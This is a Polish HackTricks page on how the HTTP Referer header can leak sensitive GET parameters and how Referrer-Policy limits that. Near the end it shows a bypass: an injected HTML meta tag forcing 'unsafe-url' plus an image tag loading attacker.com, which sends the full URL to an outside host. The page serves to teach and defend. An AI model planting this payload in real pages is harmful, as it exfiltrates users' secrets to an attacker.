2.5 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLANY SUBSKRYPCYJNE!
- Kup oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na GitHubie.
Nagłówki odwołań i polityka
Nagłówek odwołania jest używany przez przeglądarki do wskazania, która była poprzednia odwiedzona strona.
Ujawnienie wrażliwych informacji
Jeśli w pewnym momencie na stronie internetowej znajdują się jakiekolwiek wrażliwe informacje w parametrach żądania GET, jeśli strona zawiera linki do zewnętrznych źródeł lub atakujący jest w stanie sprawić/zasugerować (inżynieria społeczna), aby użytkownik odwiedził adres URL kontrolowany przez atakującego. Może to umożliwić wydostanie wrażliwych informacji w ostatnim żądaniu GET.
Ograniczenie
Możesz sprawić, że przeglądarka będzie stosować politykę odwołań (Referrer-policy), która może zapobiec wysyłaniu wrażliwych informacji do innych aplikacji internetowych:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Przeciwdziałanie
Możesz zastąpić tę regułę, używając tagu meta HTML (atakujący musi wykorzystać wstrzyknięcie HTML):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Obrona
Nigdy nie umieszczaj żadnych danych poufnych w parametrach GET ani ścieżkach w adresie URL.